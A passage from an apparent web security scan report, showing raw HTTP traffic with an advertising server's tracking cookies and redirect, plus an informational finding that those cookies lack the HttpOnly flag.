PTIVh9T9incB64/hgqfDK0QL013XAcR2XOJyAAA5vFdniF49hWrT8fR9uOV9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar3aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjjHs7vcBGSpavo22HaEjA1ba4DaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2iGpuYTDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoecLbdBeykr1KInZlRj+7F9LQMTvAHxlfg3BY6u/iHTp0QEKNmfkGRZdVhLGvY7Goafa2yt/lBjKcISAa/c80uQzhksgH6pF0cmHfqP2P02qSFNz6eMJ74hVELzN5l4DAgFOGEv7Yff4YzdAI7OC5bP5U6iQDkFclbNcZuLB/28xD4b5YEtGy2QydMcWl8nIT18I/9KHFpZKfmBXkImm6gFbB2MudKZEtB76izQuckAgZVlJ4V5t9qhXF62TO6EdyPnwlW0lCD85YsJI7JgNDWC95j/iAx5W/1ydJH20DePSoJcp093rdAxL/ln"; rsi_segs_1000000=pUP15EOheQIMpzaxu2F29/z4Oss1gLZjurYNWhPokQNisncWnkGNdTd0q7tfEV6W8KYgNWe1zVP+wCE1bPgjy4/MlMu8fmb//NXar7Y6nPMFsDruxPoho+utFRzl9KlIWGX2y70JUsCX3oMTJVeFpvQWeVG9EvO7g73n2XzRwEEq30oSRzL21IY3cRpB7Vmzy1iqPeGQBJS5IhTr1vDFC8xHxrtUssduWU5dSZDN02PVSvaPDKNavJVcnziCHODolt2y79Os6T2ZV7+uWOw6Bb9lnQdZ7gG88UntJ8C1+1XhcYHsfqd+lQ7Pi+ZYIf3rQwj4PSgc/RykJQiQCXjj7Rs1RundYD6Xg9I/w0FdmmlwAsf1Ud7bhVj1rccGdiwOKwKHslwVcWlooMuuAHdQ/ysL2mjNHQ3Cr73mIpKz56ZnRkKCUpv6L2FoypfDkuoIGiYRen9fnjxJ4gwcFowoMvUN+bMu+LYYU73iVUgpezphlKRKe54pCx/I1J3qADaapZY8OFHAOQ0jQik2eXFisC4=; rtc_VOiH=MLvntzE1JhpnJ5HL3vy4joSEnCpKJDT5hxKcHQSZ6JT8vuKgWFC/KkqDtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezvv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxb1QUwtrua8Ucrzg4vzJfn2PJmysGqjNTvrijT1zILLnNVboDI0g45fjWuY9xH/w4vXFZIWF8FIwEMvdWH4eH8msjyOFivcs8ZbMChEuxcQzs1OPTzt4/z2zQfg+U0r2ByE1yffOIkzJBe077NS+U+WgLoszKteBfOmbcvMjY4b9XgsSwNJl8xGNb+X2Vb6EXKUC3fnrpz0GxrzPRV0tE/ZCez3oWLso+cS20bk6a0T/YCM3Kx8YrNo+l8XEWwiR2vnYY/I4nLrE1ylDCslJBrnaYybrI4xUsRiGKkESiEmurOABMWe0iDI5s5dohjorfehJRmVPiseZIe1egNAPJ2sDREJJHaZCSOcmNOYjUv/jwzKPJAjAECbL+cBvQr9ESvkSC+oHALVBt53eN50LwfQvfY3vyqRGQhsyXLWCU9fKPqqqDyX31vUK5Qf4DHgePVycIZgR9/yiEg7u4V2XdfR1wx04lAxdkugCBLGP9bB95zGzeUfSMqL5NIh67S2zR4llWtdhHd00uXtcvIBe441RKNUAei9HPhEe0YjK2TjVyvleGWd3IH6E+wppl37hU1Qr3EGF4S7lDkTmn3efD2Lflf7XlHDRQrHKkSVbY53RWKhsxILQa+WWsXJfctWAmdEFxD4FnfOtpaXu7/9jcF43udjj1nxKAdsjyRGHIsB29cfDE+uLGeu1yIN0nZMyUb1ZxrECbXaG6AcZbZR7Yiy8e8YWXK7sBkaWr681aT6c4zOE78rzFEGQgwtz2vpVDZgB/cfPt5PumOWqJZQXSb3qUvzPyRujoYvnbiA697Iy+zNLvsrPK8GtNiV8huZT0y/9F77ml5eyclod+doU5GW1yisvw8E/aRqFw6fr23xlgtO2fYKBE0Mi++c4Go8uyHw3anmYqE3t7GgTG+hGsTuq8y0B5Q6Dpi8GSXBFbet7bbI7167eCobHEvfI/OQGgSO8RLR/kANo/suQA4r/efNzmetu77Pxs9uB/aBR5P3sDCD+crKivO87p/+F0pRzqRqaHANJ2CvdDWpF9SI7YZCS5pqD4Lt4XmKza1Vu22BCIVPxRudLr4+TIbfGcJYaUFSKN70dPk/DBKCWL8lktc5EvR/4t54LIttHGsLl+i4yL9qTdiMCVNNA1RVRVPQdPiTe9zez152RomS+7zblx4JsnVu0ptrty62RkHKO9TWHgLEWEo0zESWYENo/8ZNkdwyVeBZcMn2QlPLTUlMewbcVPQ0fCUANX0vBuKWgABd1yC1zLx5SkQ1unCrS9MAW9z0N7f1i12nKhxmvVlF2mR719fXVKDWIdcpihc3oWKs9q4M6O1SqkP762OqdSbf/mfAUmIp0GFtJ9qQ5sHJB3DOw1CN8cvvhlekXD0/HSJQCAxiquT7r2mgGRtQj017jkDUu

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yRO_="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8agCQaitfp6FA0C8r6hsCwn0LMa6VYK+RJFJdFHj+2+AkDORAeV/lN0GzqkDxiaWPrUzeSRTDK2Me9qyUjpSsX73sxbowAuFyRMBuLfYcr6fFEv89nvrU0fHKnzuhl7nYiag/s/1N34M3BlDS6m65V5znD3YEHJSuuCN4laK5Ey/MV16Ecne/pGaO9M5VXBjMmiGTCRtslZElDeA/D0Mci9ZT0+mtTpb4b9+jIw6JHy9x+kuFb7OetR2Jm8uzVIGCrepzwC4BD6UAnaxmTDlVk2xOmhFq9l/4uebjzrN2/N2zHbjsz5Zur30KF7L+BIJ4WxeDYINBTx2Sp/RPconlKLpwejbocdAb+G6p+egbaATDj6FskR6aHGW8mdhgdLIVBmuTSvdqtLVGfeNnjlQjgrULB3I7aN1yFsXsJnXo36VxqQs5NmHpLDZw+iQ/bw4/BG8T0VlTYceZr26z27avYq+Cfyd3CNCybazHCBBn1KT0I8C21mNk05bRcWz+exBmPDTZILNnXZ9l3ZX2LtNY60plgepYaLc1C3Xg7EVnbokG1DlhLYmUZZKIV9fSnp+jwsksXKxSoALg1MlQbw/QnOwasiU8CM4UPsX8XFC89zy1Zs4EYy02jXciOG/18vFL/RlRxPoEaRnpMuEPoG86RzldAR4krCUK3a7Auajkyr8PdnJbPYyMFrMEWyBJzbLmWhap/S52XoMDxXJpiCjcS/hfEEo4/A33PvhFo7bsdJGg44Yn9PbZEP/ZgvmIilbokZVh2SFUXOiABy/XH+dv9C9SsAQwWUUf817//oWERttQGQIxNTJf2iSqkOSeObObzxz4xseVV5qjpH9ie/homRaDYgTDsVFOiuJM16tq1oNANlWlciNzsmx+oWXS5mY2SkL6ykEuxMOggtc/tNtHijd6kRKJ85BqXbayXlCuoTWTrzaM/Y6B8BlcTT+AB2Q+CUAlPstVBxn7H+PtvwLR83UhvN2e2J651xvKnnTz6ie4"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+Tw3jz/8LS/qtrmdrNs/WP+Yp2PG2vaRqum4ZlwD+xtF/WzvYPxjEEfeOkBLjjARTnD4aJiuRsxBVtxVfgrzeB+vacIU85DgSioT4nm4HVuD2xiJAmyHOx0VIC+cT5Tm/TONrwJQqLtWqIG1BjOAWGXsU1OFFx7PNMgx1jVs9rfHpUK0ptUWrCq0NXvl9ccOEQS95bvPqdO4/Qp7ZhlVeRRVlUWMNUGfzToSrGQgCPUrUcN37/VRHr6H1nCZSgPhPPHeyB3hYiJGN0ITV16/VitLkpMZuoJ6tMR8Pj9bGLsFzC8q3wVCx7VcICwl6Beddog2FdLgJuI3BDpeI9+Hn59CNFZAZk9dT4XUySi3RdejPOvh5qNHs2dor0UHmrWx+3HEQig6C8WR4Tk+gyf68E5HFX8Gz09PxumoTwzraeb8v6z3XUq9w+TfFefoW9hI8BhzC03bcl0T91vidNsV1EbrM8FX4LGKBtyUngScVq9oxHV16eQQwjU5urgPD79m9Egj5YPqG/VUa4RSsRL21R53Ehv/4S41l+WS+Bjf/Um50FIT06oKMy3GOMJZdUURwYOyHMtzHH6MOoV/FUuwMatl0geqxZN80UlltdN1e0bBK9m72w9F+WQl658EApQbmZtLlyiWwWyfX6eeATU+kUtpMV21TrjhAUSCUaVwL96XNHELyp8Ak8G+6f39QiuNX9sYMuynQBmDTk3U2fysKpA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdUKRwlGCtvhxJ3zpMHMTeJBspSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6omRtKhpulQh/pq3wqDQU9gGDUli1ghFaisbVgsdV3PjWu3j601kvhkLW16UigGd9+OTn40j3PzSb/7R5TLzA4EX5/kGiqHVbqo2Cvb85ZjaR7Qrjg6SK8e3Mp599pwtMyOunLVy+iBHvu4DfAJjlbbgaDbUs6pVpnHZVtuWHaiPZObNwsG5Erf7AsnjNK8stheIbjqt7SVesSTfNLtKEi9Je3YzU+7itqr63frpwbYsE2f1Txe0j6ACMbDoGvhxPCKV6ozfN6H+1ud4jOfQYu2fJMR1UEowTWtgLSmAKX/F80q/AiKO4VFc9ZQA+Qc+2+04tj8hCJ3savNPbQTmT0AJNduUYRDmmpXLkV60SI+qlYWoWUqTJ6YxgY/JULB9TtnmZNjrH7/6l3OvmOQ8jeccNp7gsZNaCBd+L7uNn+HnF7zb4Yr2kFwcp1Ayq3PRqDmxMGHIoPtEJQBfc+nc3io3eYrDgGd4YkqbVcVg0fCaYKZHMNTMQZP7eGLxfDrowoJUkdmN/yOvbv/FzvYqmx7xBf5dbh1P1aFX/I703GMAJL4bJnpHCTF060yt36DPGxFGI8aUihgHsQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1147048&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=1044587&id=596291&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:09:55 GMT

13.28. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_nlnh="MLsXrqMOLjproBAxuuKo7xC/v0lmTlecDqSiToO8phWAnpO+YSTKFqU3TDxxVRk18Y3VCTjL0ah6bV8hWqwKPejoJrdpYW+maSaE+SE+JYHAqw/wQUT1qX7wDv68KC/ogKITsb9dC8gdu0uA7sN+LTYfo6fDEvy97fr0sfCIWg/dl5X5uzDg9KOQN8uVmwRirSVhkHVm0KyQbnTUGsc2ZQvcAhR0xzocc/zo82+gM1RCIH+HSCGErtUUZc9RJCGEmtyJa50VtG6uhU13oDsoWTBcH+pKwA+EFmS5nr9l5tca9Gn0G15id7IFw3BzD4Tvch7eJWmhiUjCLEDfLl0gbdj+ckvbdlfP3VayclAOz29lDjEAIM7evWDsxAp95So743zgvTRtdCe4oiCVigVSbNlYtf2gls9w4/Rbe+tmpqScTnQCnaNQwIizICQvruNgmFH/6+lojkVGlNDz5Ky3rTgx4Lb7FGgQFqtNmVDkIrLBzE5vX3eGdFDbFFVsTp88ZqFbUCErpL3v70oO0vaq8n4dLXBDnlJvcS6JdnjRk9xkIe69ZW1oeNhnpjXeiCaYl4LhoNHPSyKqNQcopy21Lq6Fx65Ehc1L/Zo9a+T+ilMYjIAgks58mh41keirnpuezj6yRhV7JX2rrCEqT/hJNxX7y2JcARkB1nMRRB8Zj9SHmrYZ638tSYG3b90lhgWBLXv0LDarrDfBS1eszRzd+qY471tll+fm92jvMhKTIDlOLkVopd2x+0aEKBYWNNN3k3toyRwrKsE4hBORWYMZSTdPaYPOQ1UPnovWcZpohcny7FCN8FH6hqZu6WJ0bE7KXD9+iEBSpnGNcjuJ57gNCQUER3dnilXxUU035Ub31YKYngAcRd67M4oL+VtrIgTE1ftBWaJU5hTHGEe4Nz2Zci3y3xXI6G85vV5OQZPwMjZ5we4k3N9bf3L5Db5oz9FeCksBpZVkBjxTqBRYGfoO/jdzHDYmpioDH7T49AzUBkFAhbVGacpYyYl5p0wOriiZcw3ZFQoSD4yzLpEu3nFozzx0"; rsi_us_1000000="pUMlIz9DOAYU1O2WA3Nf1wgg9Tpj7P+Tw3jzv8rD7yvDmvWDQ0Y8a5KAq8B98fA1QmRNDddtH/dK+uIMHXn850oVpZ6hBQpRqWE9VPS5Xy7XGW2RoRccmRQldIeS8HXSTpZFxGDjrLBA6xGO31q5lEKg7q/Zqa3Eh3raYFPi2iq2P/WUJ8LzKuLWOFTjNfjCk/0VNg4UoWYInFurSNSQ+aUh/C47rdGNAf1Dg1oVK6qn87HdFN4KIp8qp25VM4TSqlPz6cg1zQD2GwFFfzhKwHp0kGxTZK6jX8ZnXISB8sXcy0D55JrXRUETl0uoI4QVbKEZF/5dx1gs9ptsf6SthAIG43IlegqXwtMLrqqpTk/JyFQ2StgdP9FYuRHDpLz+OHzUQh1vrm5xKjX3+Q640exxVIfbO5itfUNxo5BZqgcjww3GikxnYg5fSYMvW08WJalwrMzbnGLl0KXXJ46jOVLE0Rb0yvlFoNktRzKMye9waAvctfzuH9EHwibUfXt190PEJ4A+Sg0AcAp7kOwVeDkiN2MCb3r1WPXuHm3y8pbsO2binEZAAOMbMCz6CtX91Rgn2EzUAx81QjGglnztOuUFRFlI7kjMQeXLGKWBRZdSe6eYTB6Lnh18LdQ5agXYqBlP5eTr0pdews3C7wuHkSy+cjD2XlZOYEMXQn9PuBTSjNA/XlMSRQqc9WomgO0U1VW9Z7NS9+gZx4/DR1GwAkIBjPHU5AlJIaaxmJASLwvjIxrX5KW3zZGf/mjfA2cFyChzAGmctIpu+Vd7ARiWWqAIi6cgvytaV2BRdBlrXFkhSMrlmfawqiVLWJ+RfqZK7gaVrut3WnrJOVMXXqr7CtxUK6a2Pn/1EfyMPFJStSe6uI0JDgJOOUXIh0/QlT3bEiUUzklRDfiLQQg9qZceXx0I0CFus/5FTGi3aSsJ/iOmQ7U7lJyS2obs9TpltQ/ufeib9k1qvREJYFLBR0z5bFhcp5yzXQbaEFx8ymNOXnS1itZUINjWC8jdy5PsuUT+JDJXPtf/HEu1N4a99erdLdqPuj+ki8RVgjGf1QVPdRYQN5Ikpkk0MRA5SSlsc87Euf+syX6f0SaGqcOA+LMY28by9BOfF4CjwojIYLQA7CTMmShGLD7QIoYNPB9pH3S/WcquP8g8yavfDQBU+QwcMOiGx/GukIS2j/H4BDvCbywCrbiyLf0IsbRg+/vZyQlnl03yTrzUhfJGYADGtKLHujYIlWVJ2juevHA9vZrI2f0zNZZFT5Ox5BJBvBcQLenCuVaRyx9ZwQYz5yUzskZStzZiHbYlVsH1sWxuxzg1xSosd3Tq17MFdy1sDZD30OeKip7ei44DiArBocEjjeNpiyKtXSdt7rrwtwl36hGrMTrfhX6+/bn0kr2hGgVBE+oKtf3pVCXZqMHah6gq1RieAs/KWLv+Kc38x5h3OOZj9/KY5a5+y4Drg4l7b9rJsCgZP8zktKSaeNFEIDZ35+CtVymuq0xkEBJifIs="; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlnh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qnR8="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFC/qvI8UwNJUUXVf8UFXhKHlhtaTUsyteYavE/JCbILBh6e6fDPyLIUBVfPETsbapUReItzvgd4yBCIY+E81bY+HYOQ3Pa29yevZZMl3HBn6LQlyY6PJ+czZuXLZe06b5Mm+7Iv99PwLcTYhyG/rkEfRgo8ZzlmEWSabIWmExsmjaW872x+SfOUSN7hNLNcWrYCfkA4LhWl+W35+1oXAbuEcAt099ocpLqCeBuUa4NqIzvJ1QNyaif9nLJmXcZyxS9cTONiH3V0ZjJTiF72mjpLtgf4H90Hy/RyPGV7MWvrWcP675mv4O5RMCAsEJynKxutWJ9DlV8F5uhY4uCycogkYT+4CCUzwdMbEv9C2Szlac+IDVck263jdk3dT+zoGHYihNaIARzL3SCvGwlor6TRnGUuztCIN92HiEAUbxkj4Ecd2786JNnWbBSOmn03YIhl67iByEEk4+vZ3SORGuH7RohIA8zgHCdEYwFbIBGTm+m8T9qJ1T3zHOVrGATIL0BFGWF2hJ/6LRcbPPXEpsg1BWTLSB9ho8hlqcrViz+W92j2+tNFa6RgdOR62lOFE5QDsjdCoyi+e7zIFDDhlD6vz+3CLT4ABtDGVj9H1UDABGB1IiEvASmLjYsEnI9/3inbprhMgZEKeFyAA00nAcezbPVyc5aEhbffKYesm4nF7NH6kU6R//GWExLgUKPPUqlFqahhiTb9vbV4aky1/c9p3zoZzEpqEg1egxFhOGlK5bpioc8766Koy41haN7c4IgA0LL/YlgqiZiZ9ebb8RCR/Y6qiM4sltJIIFkkGr+XSltrQ/Kk4CRo1mKzqqOUND0t2yHpnWmhPC2BQm7PhmGrI2QI8vR7esqlmRnrVzgYkE32hjrd+IqJ3/Mo/y10tySvoTMQgg0Ld/xVhEpS6PyvMey0Liyk4vnPrbs9UYPpQ193dMvRYmmL4vdQiw7HU5cdjnLsrfiaHUzF+PXn5LPn1ALry8g"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm+2LS9kU2pq84TPKMUJYsSamWvaRqum4ZlwD+htF/WzvYPxjEEfeOkBLjjASSNbdvlwBTARhFD0vnpnUQDltbU+8KNhj4BKp+e1bYJu0pA65zeD3CpncMlg3/+sBnm/l0R76TeTGfGgjCv4Gmxkxvdj7c//jOa/2OkQIQCV4QVSbydyGPpmFxiIJ8N0woA3MNzSiY/UNsOyDqN2JctqbLRk4te1Irfyk0AANpfdPXSGIl4Cn6dMSmHs+/LulphDiyap7cbEexsLxFDYERec+aXVc9NqVjSdqj2J52oP+vf8ps6Fn92hhEy0x9NzvpZ6r7il0NAFdwS2BPMxjmRJn3H+CJ4vcrAcDVyHfMXCuHbzuvIXbF1JM+W95OXHpJeFjcwDGWrnnP8M62BAMl0B2uHruFo5Njp4vPKqcGt1f38UxiG78X4lkyY5KXDlOf5o+y9AEZ2czhhLW7ZyMeijCBOO0TMqkkcgw6TVJxf9kEDMoC+jf+O+Qp6jWxBFUfthXK/MKeGkM7X+tGpYMjO5t+ZWCNPJXfyTsS1wXUuK/awFub5KSGKgkc3TqKE/u+DSZcxbwBRdbrWQ5zlxrV2RkrK5bhemyFTiBRETGlILJeVlV5RFYaWTei7+QatRZwO/f9sW2gs9MboAD1cQtX3bhLEYk4qGNqwEQH8O4bzAB2LiuMabs+SewYRooJfpioKDDHwltRP9+Vi0K5LeLy73fAtGIkh8Zx9wgZQRv42T+M8D2WJv7EtKesl6Ba/Y6R6rhmSZofOlZ38Bl948K